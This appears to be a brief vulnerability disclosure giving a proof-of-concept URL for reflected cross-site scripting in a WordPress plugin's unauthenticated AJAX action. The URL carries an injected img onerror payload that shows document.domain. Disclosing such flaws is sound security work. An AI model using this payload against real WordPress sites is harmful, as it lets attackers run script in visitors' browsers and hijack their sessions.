Select Page
PoC URL (uses unauthenticated action "heateor_sss_sharing_count"): http://WORDPRESS_DOMAIN_HERE/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[<img%20src%3dx%20onerror%3dalert(document.domain)>]= Other authenticated AJAX actions may also lead to reflected XSS, but not tested.